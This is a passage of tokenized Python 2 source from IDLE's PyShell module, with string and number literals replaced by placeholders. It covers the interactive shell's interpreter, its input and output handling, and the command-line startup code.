debugger <EOL> def open_remote_stack_viewer ( self ) : <EOL> """<STR_LIT>""" <EOL> self . tkconsole . text . after ( <NUM_LIT> , self . remote_stack_viewer ) <EOL> return <EOL> def remote_stack_viewer ( self ) : <EOL> import RemoteObjectBrowser <EOL> oid = self . rpcclt . remotequeue ( "<STR_LIT>" , "<STR_LIT>" , ( "<STR_LIT>" , ) , { } ) <EOL> if oid is None : <EOL> self . tkconsole . root . bell ( ) <EOL> return <EOL> item = RemoteObjectBrowser . StubObjectTreeItem ( self . rpcclt , oid ) <EOL> from TreeWidget import ScrolledCanvas , TreeNode <EOL> top = Toplevel ( self . tkconsole . root ) <EOL> theme = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> background = idleConf . GetHighlight ( theme , '<STR_LIT>' ) [ '<STR_LIT>' ] <EOL> sc = ScrolledCanvas ( top , bg = background , highlightthickness = <NUM_LIT:0> ) <EOL> sc . frame . pack ( expand = <NUM_LIT:1> , fill = "<STR_LIT>" ) <EOL> node = TreeNode ( sc . canvas , None , item ) <EOL> node . expand ( ) <EOL> gid = <NUM_LIT:0> <EOL> def execsource ( self , source ) : <EOL> "<STR_LIT>" <EOL> filename = self . stuffsource ( source ) <EOL> self . execfile ( filename , source ) <EOL> def execfile ( self , filename , source = None ) : <EOL> "<STR_LIT>" <EOL> if source is None : <EOL> source = open ( filename , "<STR_LIT:r>" ) . read ( ) <EOL> try : <EOL> code = compile ( source , filename , "<STR_LIT>" ) <EOL> except ( OverflowError , SyntaxError ) : <EOL> self . tkconsole . resetoutput ( ) <EOL> tkerr = self . tkconsole . stderr <EOL> print >> tkerr , '<STR_LIT>' <EOL> print >> tkerr , '<STR_LIT>' <EOL> InteractiveInterpreter . showsyntaxerror ( self , filename ) <EOL> self . tkconsole . showprompt ( ) <EOL> else : <EOL> self . runcode ( code ) <EOL> def runsource ( self , source ) : <EOL> "<STR_LIT>" <EOL> filename = self . stuffsource ( source ) <EOL> self . more = <NUM_LIT:0> <EOL> self . save_warnings_filters = warnings . filters [ : ] <EOL> warnings . 
filterwarnings ( action = "<STR_LIT:error>" , category = SyntaxWarning ) <EOL> if isinstance ( source , types . UnicodeType ) : <EOL> import IOBinding <EOL> try : <EOL> source = source . encode ( IOBinding . encoding ) <EOL> except UnicodeError : <EOL> self . tkconsole . resetoutput ( ) <EOL> self . write ( "<STR_LIT>" ) <EOL> return <EOL> try : <EOL> return InteractiveInterpreter . runsource ( self , source , filename ) <EOL> finally : <EOL> if self . save_warnings_filters is not None : <EOL> warnings . filters [ : ] = self . save_warnings_filters <EOL> self . save_warnings_filters = None <EOL> def stuffsource ( self , source ) : <EOL> "<STR_LIT>" <EOL> filename = "<STR_LIT>" % self . gid <EOL> self . gid = self . gid + <NUM_LIT:1> <EOL> lines = source . split ( "<STR_LIT:\n>" ) <EOL> linecache . cache [ filename ] = len ( source ) + <NUM_LIT:1> , <NUM_LIT:0> , lines , filename <EOL> return filename <EOL> def prepend_syspath ( self , filename ) : <EOL> "<STR_LIT>" <EOL> self . runcommand ( """<STR_LIT>""" % ( filename , ) ) <EOL> def showsyntaxerror ( self , filename = None ) : <EOL> """<STR_LIT>""" <EOL> text = self . tkconsole . text <EOL> stuff = self . unpackerror ( ) <EOL> if stuff : <EOL> msg , lineno , offset , line = stuff <EOL> if lineno == <NUM_LIT:1> : <EOL> pos = "<STR_LIT>" % ( offset - <NUM_LIT:1> ) <EOL> else : <EOL> pos = "<STR_LIT>" % ( lineno - <NUM_LIT:1> , offset - <NUM_LIT:1> ) <EOL> text . tag_add ( "<STR_LIT>" , pos ) <EOL> text . see ( pos ) <EOL> char = text . get ( pos ) <EOL> if char and char in IDENTCHARS : <EOL> text . tag_add ( "<STR_LIT>" , pos + "<STR_LIT>" , pos ) <EOL> self . tkconsole . resetoutput ( ) <EOL> self . write ( "<STR_LIT>" % str ( msg ) ) <EOL> else : <EOL> self . tkconsole . resetoutput ( ) <EOL> InteractiveInterpreter . showsyntaxerror ( self , filename ) <EOL> self . tkconsole . showprompt ( ) <EOL> def unpackerror ( self ) : <EOL> type , value , tb = sys . 
exc_info ( ) <EOL> ok = type is SyntaxError <EOL> if ok : <EOL> try : <EOL> msg , ( dummy_filename , lineno , offset , line ) = value <EOL> if not offset : <EOL> offset = <NUM_LIT:0> <EOL> except : <EOL> ok = <NUM_LIT:0> <EOL> if ok : <EOL> return msg , lineno , offset , line <EOL> else : <EOL> return None <EOL> def showtraceback ( self , temp_filename = None ) : <EOL> """<STR_LIT>""" <EOL> self . tkconsole . resetoutput ( ) <EOL> self . checklinecache ( ) <EOL> typ , value , tb = sys . exc_info ( ) <EOL> sys . last_type = typ <EOL> sys . last_value = value <EOL> sys . last_traceback = tb <EOL> tblist = traceback . extract_tb ( tb ) <EOL> del tblist [ : <NUM_LIT:1> ] <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> if temp_filename is not None : <EOL> main_fname = '<STR_LIT>' <EOL> new_tb = [ ] <EOL> for t in tblist : <EOL> fname = main_fname if t [ <NUM_LIT:0> ] == temp_filename else t [ <NUM_LIT:0> ] <EOL> new_tb . append ( ( fname , ) + t [ <NUM_LIT:1> : ] ) <EOL> tblist = new_tb <EOL> else : <EOL> main_fname = tblist [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> tb_print_list ( tblist , main_fname , sys . stdout , sys . stderr ) <EOL> lines = traceback . format_exception_only ( typ , value ) <EOL> map ( sys . stderr . write , lines ) <EOL> if self . tkconsole . getvar ( "<STR_LIT>" ) : <EOL> self . tkconsole . open_stack_viewer ( ) <EOL> def checklinecache ( self ) : <EOL> c = linecache . cache <EOL> for key in c . keys ( ) : <EOL> if key [ : <NUM_LIT:1> ] + key [ - <NUM_LIT:1> : ] != "<STR_LIT>" : <EOL> del c [ key ] <EOL> def runcommand ( self , code ) : <EOL> "<STR_LIT>" <EOL> if self . tkconsole . executing : <EOL> self . display_executing_dialog ( ) <EOL> return <NUM_LIT:0> <EOL> if self . rpcclt : <EOL> self . rpcclt . remotequeue ( "<STR_LIT>" , "<STR_LIT>" , ( code , ) , { } ) <EOL> else : <EOL> exec code in self . locals <EOL> return <NUM_LIT:1> <EOL> def runcode ( self , code , tempname = None ) : <EOL> "<STR_LIT>" <EOL> if self . tkconsole . 
executing : <EOL> self . interp . restart_subprocess ( ) <EOL> self . checklinecache ( ) <EOL> if self . save_warnings_filters is not None : <EOL> warnings . filters [ : ] = self . save_warnings_filters <EOL> self . save_warnings_filters = None <EOL> debugger = self . debugger <EOL> try : <EOL> self . tkconsole . beginexecuting ( ) <EOL> if not debugger and self . rpcclt is not None : <EOL> self . active_seq = self . rpcclt . asyncqueue ( "<STR_LIT>" , "<STR_LIT>" , <EOL> ( code , tempname ) , { } ) <EOL> elif debugger : <EOL> debugger . run ( code , self . locals ) <EOL> else : <EOL> exec code in self . locals <EOL> except SystemExit : <EOL> if not self . tkconsole . closing : <EOL> if tkMessageBox . askyesno ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT:yes>" , <EOL> master = self . tkconsole . text ) : <EOL> raise <EOL> else : <EOL> self . showtraceback ( ) <EOL> else : <EOL> raise <EOL> except : <EOL> if use_subprocess : <EOL> print >> self . tkconsole . stderr , "<STR_LIT>" <EOL> self . showtraceback ( ) <EOL> self . tkconsole . endexecuting ( ) <EOL> else : <EOL> if self . tkconsole . canceled : <EOL> self . tkconsole . canceled = False <EOL> print >> self . tkconsole . stderr , "<STR_LIT>" <EOL> else : <EOL> self . showtraceback ( tempname ) <EOL> finally : <EOL> if not use_subprocess : <EOL> try : <EOL> self . tkconsole . endexecuting ( ) <EOL> except AttributeError : <EOL> pass <EOL> def write ( self , s ) : <EOL> "<STR_LIT>" <EOL> self . tkconsole . stderr . write ( s ) <EOL> def display_port_binding_error ( self ) : <EOL> tkMessageBox . showerror ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> master = self . tkconsole . text ) <EOL> def display_no_subprocess_error ( self ) : <EOL> tkMessageBox . showerror ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> master = self . tkconsole . 
text ) <EOL> def display_executing_dialog ( self ) : <EOL> tkMessageBox . showerror ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> master = self . tkconsole . text ) <EOL> class PyShell ( OutputWindow ) : <EOL> shell_title = "<STR_LIT>" <EOL> ColorDelegator = ModifiedColorDelegator <EOL> UndoDelegator = ModifiedUndoDelegator <EOL> menu_specs = [ <EOL> ( "<STR_LIT:file>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] <EOL> if macosxSupport . runningAsOSXApp ( ) : <EOL> del menu_specs [ - <NUM_LIT:3> ] <EOL> menu_specs [ - <NUM_LIT:2> ] = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> from IdleHistory import History <EOL> def __init__ ( self , flist = None ) : <EOL> if use_subprocess : <EOL> ms = self . menu_specs <EOL> if ms [ <NUM_LIT:2> ] [ <NUM_LIT:0> ] != "<STR_LIT>" : <EOL> ms . insert ( <NUM_LIT:2> , ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> self . interp = ModifiedInterpreter ( self ) <EOL> if flist is None : <EOL> root = Tk ( ) <EOL> fixwordbreaks ( root ) <EOL> root . withdraw ( ) <EOL> flist = PyShellFileList ( root ) <EOL> OutputWindow . __init__ ( self , flist , None , None ) <EOL> self . usetabs = True <EOL> self . indentwidth = <NUM_LIT:8> <EOL> self . context_use_ps1 = True <EOL> text = self . text <EOL> text . configure ( wrap = "<STR_LIT>" ) <EOL> text . bind ( "<STR_LIT>" , self . enter_callback ) <EOL> text . bind ( "<STR_LIT>" , self . linefeed_callback ) <EOL> text . bind ( "<STR_LIT>" , self . cancel_callback ) <EOL> text . bind ( "<STR_LIT>" , self . eof_callback ) <EOL> text . bind ( "<STR_LIT>" , self . open_stack_viewer ) <EOL> text . bind ( "<STR_LIT>" , self . toggle_debugger ) <EOL> text . bind ( "<STR_LIT>" , self . toggle_jit_stack_viewer ) <EOL> if use_subprocess : <EOL> text . bind ( "<STR_LIT>" , self . view_restart_mark ) <EOL> text . bind ( "<STR_LIT>" , self . 
restart_shell ) <EOL> self . save_stdout = sys . stdout <EOL> self . save_stderr = sys . stderr <EOL> self . save_stdin = sys . stdin <EOL> import IOBinding <EOL> self . stdout = PseudoFile ( self , "<STR_LIT>" , IOBinding . encoding ) <EOL> self . stderr = PseudoStderrFile ( self , encoding = IOBinding . encoding ) <EOL> self . console = PseudoFile ( self , "<STR_LIT>" , IOBinding . encoding ) <EOL> if not use_subprocess : <EOL> sys . stdout = self . stdout <EOL> sys . stderr = self . stderr <EOL> sys . stdin = self <EOL> self . history = self . History ( self . text ) <EOL> self . pollinterval = <NUM_LIT:50> <EOL> self . _cleanup_funcs = [ ] <EOL> def append_cleanup_func ( self , func , * args , ** kwargs ) : <EOL> self . _cleanup_funcs . append ( ( func , args , kwargs ) ) <EOL> def get_standard_extension_names ( self ) : <EOL> return idleConf . GetExtensions ( shell_only = True ) <EOL> reading = False <EOL> executing = False <EOL> canceled = False <EOL> endoffile = False <EOL> closing = False <EOL> def set_warning_stream ( self , stream ) : <EOL> global warning_stream <EOL> warning_stream = stream <EOL> def get_warning_stream ( self ) : <EOL> return warning_stream <EOL> def toggle_debugger ( self , event = None ) : <EOL> if self . executing : <EOL> tkMessageBox . showerror ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> master = self . text ) <EOL> self . set_debugger_indicator ( ) <EOL> return "<STR_LIT>" <EOL> else : <EOL> db = self . interp . getdebugger ( ) <EOL> if db : <EOL> self . close_debugger ( ) <EOL> else : <EOL> self . open_debugger ( ) <EOL> def set_debugger_indicator ( self ) : <EOL> db = self . interp . getdebugger ( ) <EOL> self . setvar ( "<STR_LIT>" , not not db ) <EOL> def toggle_jit_stack_viewer ( self , event = None ) : <EOL> pass <EOL> def close_debugger ( self ) : <EOL> db = self . interp . getdebugger ( ) <EOL> if db : <EOL> self . interp . setdebugger ( None ) <EOL> db . close ( ) <EOL> if self . interp . rpcclt : <EOL> RemoteDebugger . 
close_remote_debugger ( self . interp . rpcclt ) <EOL> self . resetoutput ( ) <EOL> self . console . write ( "<STR_LIT>" ) <EOL> sys . ps1 = "<STR_LIT>" <EOL> self . showprompt ( ) <EOL> self . set_debugger_indicator ( ) <EOL> def open_debugger ( self ) : <EOL> if self . interp . rpcclt : <EOL> dbg_gui = RemoteDebugger . start_remote_debugger ( self . interp . rpcclt , <EOL> self ) <EOL> else : <EOL> dbg_gui = Debugger . Debugger ( self ) <EOL> self . interp . setdebugger ( dbg_gui ) <EOL> dbg_gui . load_breakpoints ( ) <EOL> sys . ps1 = "<STR_LIT>" <EOL> self . showprompt ( ) <EOL> self . set_debugger_indicator ( ) <EOL> def beginexecuting ( self ) : <EOL> "<STR_LIT>" <EOL> self . resetoutput ( ) <EOL> self . executing = <NUM_LIT:1> <EOL> def endexecuting ( self ) : <EOL> "<STR_LIT>" <EOL> self . executing = <NUM_LIT:0> <EOL> self . canceled = <NUM_LIT:0> <EOL> self . showprompt ( ) <EOL> for func , args , kwargs in self . _cleanup_funcs : <EOL> func ( * args , ** kwargs ) <EOL> self . _cleanup_funcs = [ ] <EOL> def close ( self ) : <EOL> "<STR_LIT>" <EOL> if self . executing : <EOL> response = tkMessageBox . askokcancel ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT>" , <EOL> parent = self . text ) <EOL> if response is False : <EOL> return "<STR_LIT>" <EOL> if self . reading : <EOL> self . top . quit ( ) <EOL> self . canceled = True <EOL> self . closing = True <EOL> self . text . after ( <NUM_LIT:2> * self . pollinterval , self . close2 ) <EOL> def close2 ( self ) : <EOL> return EditorWindow . close ( self ) <EOL> def _close ( self ) : <EOL> "<STR_LIT>" <EOL> self . close_debugger ( ) <EOL> if use_subprocess : <EOL> self . interp . kill_subprocess ( ) <EOL> sys . stdout = self . save_stdout <EOL> sys . stderr = self . save_stderr <EOL> sys . stdin = self . save_stdin <EOL> self . interp = None <EOL> self . console = None <EOL> self . flist . pyshell = None <EOL> self . history = None <EOL> EditorWindow . 
_close ( self ) <EOL> def ispythonsource ( self , filename ) : <EOL> "<STR_LIT>" <EOL> return True <EOL> def short_title ( self ) : <EOL> return self . shell_title <EOL> COPYRIGHT = '<STR_LIT>' <EOL> def begin ( self ) : <EOL> self . resetoutput ( ) <EOL> if use_subprocess : <EOL> nosub = '<STR_LIT>' <EOL> client = self . interp . start_subprocess ( ) <EOL> if not client : <EOL> self . close ( ) <EOL> return False <EOL> else : <EOL> nosub = "<STR_LIT>" <EOL> self . write ( "<STR_LIT>" % <EOL> ( sys . version , sys . platform , self . COPYRIGHT , nosub ) ) <EOL> self . showprompt ( ) <EOL> import Tkinter <EOL> Tkinter . _default_root = None <EOL> return True <EOL> def readline ( self ) : <EOL> save = self . reading <EOL> try : <EOL> self . reading = <NUM_LIT:1> <EOL> self . top . mainloop ( ) <EOL> finally : <EOL> self . reading = save <EOL> line = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if len ( line ) == <NUM_LIT:0> : <EOL> line = "<STR_LIT:\n>" <EOL> if isinstance ( line , unicode ) : <EOL> import IOBinding <EOL> try : <EOL> line = line . encode ( IOBinding . encoding ) <EOL> except UnicodeError : <EOL> pass <EOL> self . resetoutput ( ) <EOL> if self . canceled : <EOL> self . canceled = <NUM_LIT:0> <EOL> if not use_subprocess : <EOL> raise KeyboardInterrupt <EOL> if self . endoffile : <EOL> self . endoffile = <NUM_LIT:0> <EOL> line = "<STR_LIT>" <EOL> return line <EOL> def isatty ( self ) : <EOL> return True <EOL> def cancel_callback ( self , event = None ) : <EOL> try : <EOL> if self . text . compare ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> return <EOL> except : <EOL> pass <EOL> if not ( self . executing or self . reading ) : <EOL> self . resetoutput ( ) <EOL> self . interp . write ( "<STR_LIT>" ) <EOL> self . showprompt ( ) <EOL> return "<STR_LIT>" <EOL> self . endoffile = <NUM_LIT:0> <EOL> self . canceled = <NUM_LIT:1> <EOL> if ( self . executing and self . interp . rpcclt ) : <EOL> if self . interp . getdebugger ( ) : <EOL> self . 
interp . restart_subprocess ( ) <EOL> else : <EOL> self . interp . interrupt_subprocess ( ) <EOL> if self . reading : <EOL> self . top . quit ( ) <EOL> return "<STR_LIT>" <EOL> def eof_callback ( self , event ) : <EOL> if self . executing and not self . reading : <EOL> return <EOL> if not ( self . text . compare ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) and <EOL> self . text . compare ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> return <EOL> if not self . executing : <EOL> self . resetoutput ( ) <EOL> self . close ( ) <EOL> else : <EOL> self . canceled = <NUM_LIT:0> <EOL> self . endoffile = <NUM_LIT:1> <EOL> self . top . quit ( ) <EOL> return "<STR_LIT>" <EOL> def linefeed_callback ( self , event ) : <EOL> if self . reading : <EOL> self . text . insert ( "<STR_LIT>" , "<STR_LIT:\n>" ) <EOL> self . text . see ( "<STR_LIT>" ) <EOL> else : <EOL> self . newline_and_indent_event ( event ) <EOL> return "<STR_LIT>" <EOL> def enter_callback ( self , event ) : <EOL> if self . executing and not self . reading : <EOL> return <EOL> try : <EOL> sel = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if sel : <EOL> if self . text . compare ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> self . recall ( sel , event ) <EOL> return "<STR_LIT>" <EOL> except : <EOL> pass <EOL> if self . text . compare ( "<STR_LIT>" , "<STR_LIT:<>" , "<STR_LIT>" ) : <EOL> prev = self . text . tag_prevrange ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if prev and self . text . compare ( "<STR_LIT>" , "<STR_LIT:<>" , prev [ <NUM_LIT:1> ] ) : <EOL> self . recall ( self . text . get ( prev [ <NUM_LIT:0> ] , prev [ <NUM_LIT:1> ] ) , event ) <EOL> return "<STR_LIT>" <EOL> next = self . text . tag_nextrange ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if next and self . text . compare ( "<STR_LIT>" , "<STR_LIT>" , next [ <NUM_LIT:0> ] ) : <EOL> self . recall ( self . text . get ( next [ <NUM_LIT:0> ] , next [ <NUM_LIT:1> ] ) , event ) <EOL> return "<STR_LIT>" <EOL> indices = self . text . 
tag_nextrange ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if indices and self . text . compare ( indices [ <NUM_LIT:0> ] , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> self . recall ( self . text . get ( indices [ <NUM_LIT:1> ] , "<STR_LIT>" ) , event ) <EOL> else : <EOL> self . recall ( self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) , event ) <EOL> return "<STR_LIT>" <EOL> if self . text . compare ( "<STR_LIT>" , "<STR_LIT:<>" , "<STR_LIT>" ) : <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> s = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if s and not s . strip ( ) : <EOL> self . text . delete ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if self . text . compare ( "<STR_LIT>" , "<STR_LIT:<>" , "<STR_LIT>" ) : <EOL> self . newline_and_indent_event ( event ) <EOL> return "<STR_LIT>" <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if self . reading : <EOL> self . text . insert ( "<STR_LIT>" , "<STR_LIT:\n>" ) <EOL> self . text . see ( "<STR_LIT>" ) <EOL> else : <EOL> self . newline_and_indent_event ( event ) <EOL> self . text . tag_add ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . text . update_idletasks ( ) <EOL> if self . reading : <EOL> self . top . quit ( ) <EOL> else : <EOL> self . runit ( ) <EOL> return "<STR_LIT>" <EOL> def recall ( self , s , event ) : <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , s ) <EOL> lines = s . split ( '<STR_LIT:\n>' ) <EOL> self . text . undo_block_start ( ) <EOL> try : <EOL> self . text . tag_remove ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT:end>" ) <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> prefix = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if prefix . rstrip ( ) . endswith ( '<STR_LIT::>' ) : <EOL> self . newline_and_indent_event ( event ) <EOL> prefix = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . text . insert ( "<STR_LIT>" , lines [ <NUM_LIT:0> ] . 
strip ( ) ) <EOL> if len ( lines ) > <NUM_LIT:1> : <EOL> orig_base_indent = re . search ( r'<STR_LIT>' , lines [ <NUM_LIT:0> ] ) . group ( <NUM_LIT:0> ) <EOL> new_base_indent = re . search ( r'<STR_LIT>' , prefix ) . group ( <NUM_LIT:0> ) <EOL> for line in lines [ <NUM_LIT:1> : ] : <EOL> if line . startswith ( orig_base_indent ) : <EOL> line = new_base_indent + line [ len ( orig_base_indent ) : ] <EOL> self . text . insert ( '<STR_LIT>' , '<STR_LIT:\n>' + line . rstrip ( ) ) <EOL> finally : <EOL> self . text . see ( "<STR_LIT>" ) <EOL> self . text . undo_block_stop ( ) <EOL> def runit ( self ) : <EOL> line = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> i = len ( line ) <EOL> while i > <NUM_LIT:0> and line [ i - <NUM_LIT:1> ] in "<STR_LIT>" : <EOL> i = i - <NUM_LIT:1> <EOL> if i > <NUM_LIT:0> and line [ i - <NUM_LIT:1> ] == "<STR_LIT:\n>" : <EOL> i = i - <NUM_LIT:1> <EOL> while i > <NUM_LIT:0> and line [ i - <NUM_LIT:1> ] in "<STR_LIT>" : <EOL> i = i - <NUM_LIT:1> <EOL> line = line [ : i ] <EOL> more = self . interp . runsource ( line ) <EOL> def open_stack_viewer ( self , event = None ) : <EOL> if self . interp . rpcclt : <EOL> return self . interp . remote_stack_viewer ( ) <EOL> try : <EOL> sys . last_traceback <EOL> except : <EOL> tkMessageBox . showerror ( "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> master = self . text ) <EOL> return <EOL> from StackViewer import StackBrowser <EOL> sv = StackBrowser ( self . root , self . flist ) <EOL> def view_restart_mark ( self , event = None ) : <EOL> text = self . text <EOL> text . see ( "<STR_LIT>" ) <EOL> ranges = text . tag_ranges ( "<STR_LIT>" ) <EOL> if not ranges : <EOL> return <EOL> restart_line = self . interp . get_restart_line ( ) <EOL> for indx in range ( len ( ranges ) , <NUM_LIT:0> , - <NUM_LIT:2> ) : <EOL> lineno = '<STR_LIT>' % str ( ranges [ indx - <NUM_LIT:1> ] ) . 
split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> start , end = ( '<STR_LIT>' % lineno , '<STR_LIT>' % lineno ) <EOL> content = text . get ( start , end ) [ <NUM_LIT:4> : ] . rstrip ( ) <EOL> if content and content [ : - <NUM_LIT:2> ] != restart_line : <EOL> break <EOL> text . see ( lineno ) <EOL> def restart_shell ( self , event = None ) : <EOL> self . stderr . signaled = False <EOL> self . interp . restart_subprocess ( ) <EOL> def showprompt ( self ) : <EOL> self . resetoutput ( ) <EOL> try : <EOL> s = str ( sys . ps1 ) <EOL> except : <EOL> s = "<STR_LIT>" <EOL> self . console . write ( s ) <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . set_line_and_column ( ) <EOL> self . io . reset_undo ( ) <EOL> def resetoutput ( self ) : <EOL> source = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if self . history : <EOL> self . history . history_store ( source ) <EOL> if self . text . get ( "<STR_LIT>" ) != "<STR_LIT:\n>" : <EOL> self . text . insert ( "<STR_LIT>" , "<STR_LIT:\n>" ) <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . set_line_and_column ( ) <EOL> sys . stdout . softspace = <NUM_LIT:0> <EOL> def write ( self , s , tags = ( ) ) : <EOL> try : <EOL> self . text . mark_gravity ( "<STR_LIT>" , "<STR_LIT:right>" ) <EOL> OutputWindow . write ( self , s , tags , "<STR_LIT>" ) <EOL> self . text . mark_gravity ( "<STR_LIT>" , "<STR_LIT:left>" ) <EOL> except : <EOL> pass <EOL> if self . canceled : <EOL> self . canceled = <NUM_LIT:0> <EOL> if not use_subprocess : <EOL> raise KeyboardInterrupt <EOL> class PseudoFile ( object ) : <EOL> def __init__ ( self , shell , tags , encoding = None ) : <EOL> self . shell = shell <EOL> self . tags = tags <EOL> self . softspace = <NUM_LIT:0> <EOL> self . encoding = encoding <EOL> def write ( self , s ) : <EOL> self . shell . write ( s , self . tags ) <EOL> def writelines ( self , l ) : <EOL> map ( self . 
write , l ) <EOL> def flush ( self ) : <EOL> pass <EOL> def isatty ( self ) : <EOL> return True <EOL> class PseudoStderrFile ( PseudoFile ) : <EOL> def __init__ ( self , shell , tags = "<STR_LIT>" , encoding = None ) : <EOL> PseudoFile . __init__ ( self , shell , tags , encoding ) <EOL> self . signaled = False <EOL> def write ( self , s ) : <EOL> if not self . signaled : <EOL> signal_err = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , default = <NUM_LIT:1> , type = '<STR_LIT:bool>' ) <EOL> if signal_err : <EOL> self . shell . top . wakeup ( anystate = True ) <EOL> self . signaled = True <EOL> PseudoFile . write ( self , s ) <EOL> usage_msg = """<STR_LIT>""" <EOL> def main ( ) : <EOL> global flist , root , use_subprocess <EOL> use_subprocess = True <EOL> enable_shell = False <EOL> enable_edit = False <EOL> debug = False <EOL> cmd = None <EOL> script = None <EOL> startup = False <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT>" ) <EOL> except getopt . error , msg : <EOL> sys . stderr . write ( "<STR_LIT>" % str ( msg ) ) <EOL> sys . stderr . write ( usage_msg ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> for o , a in opts : <EOL> if o == '<STR_LIT:-c>' : <EOL> cmd = a <EOL> enable_shell = True <EOL> if o == '<STR_LIT>' : <EOL> debug = True <EOL> enable_shell = True <EOL> if o == '<STR_LIT>' : <EOL> enable_edit = True <EOL> if o == '<STR_LIT>' : <EOL> sys . stdout . write ( usage_msg ) <EOL> sys . exit ( ) <EOL> if o == '<STR_LIT>' : <EOL> enable_shell = True <EOL> if o == '<STR_LIT>' : <EOL> use_subprocess = False <EOL> if o == '<STR_LIT>' : <EOL> script = a <EOL> if os . path . isfile ( script ) : <EOL> pass <EOL> else : <EOL> print "<STR_LIT>" , script <EOL> sys . exit ( ) <EOL> enable_shell = True <EOL> if o == '<STR_LIT>' : <EOL> startup = True <EOL> enable_shell = True <EOL> if o == '<STR_LIT>' : <EOL> PyShell . 
shell_title = a <EOL> enable_shell = True <EOL> if args and args [ <NUM_LIT:0> ] == '<STR_LIT:->' : <EOL> cmd = sys . stdin . read ( ) <EOL> enable_shell = True <EOL> for i in range ( len ( sys . path ) ) : <EOL> sys . path [ i ] = os . path . abspath ( sys . path [ i ] ) <EOL> if args and args [ <NUM_LIT:0> ] == '<STR_LIT:->' : <EOL> sys . argv = [ '<STR_LIT>' ] + args [ <NUM_LIT:1> : ] <EOL> elif cmd : <EOL> sys . argv = [ '<STR_LIT:-c>' ] + args <EOL> elif script : <EOL> sys . argv = [ script ] + args <EOL> elif args : <EOL> enable_edit = True <EOL> pathx = [ ] <EOL> for filename in args : <EOL> pathx . append ( os . path . dirname ( filename ) ) <EOL> for dir in pathx : <EOL> dir = os . path . abspath ( dir ) <EOL> if not dir in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , dir ) <EOL> else : <EOL> dir = os . getcwd ( ) <EOL> if not dir in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , dir ) <EOL> edit_start = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , type = '<STR_LIT:bool>' ) <EOL> enable_edit = enable_edit or edit_start <EOL> enable_shell = enable_shell or not edit_start <EOL> root = Tk ( className = "<STR_LIT>" ) <EOL> fixwordbreaks ( root ) <EOL> root . withdraw ( ) <EOL> flist = PyShellFileList ( root ) <EOL> macosxSupport . setupApp ( root , flist ) <EOL> if enable_edit : <EOL> if not ( cmd or script ) : <EOL> for filename in args : <EOL> flist . open ( filename ) <EOL> if not args : <EOL> flist . new ( ) <EOL> if enable_shell : <EOL> shell = flist . open_shell ( ) <EOL> if not shell : <EOL> return <EOL> if macosxSupport . runningAsOSXApp ( ) and flist . dict : <EOL> shell . top . lower ( ) <EOL> shell = flist . pyshell <EOL> if debug : <EOL> shell . open_debugger ( ) <EOL> if startup : <EOL> filename = os . environ . get ( "<STR_LIT>" ) or os . environ . get ( "<STR_LIT>" ) <EOL> if filename and os . path . isfile ( filename ) : 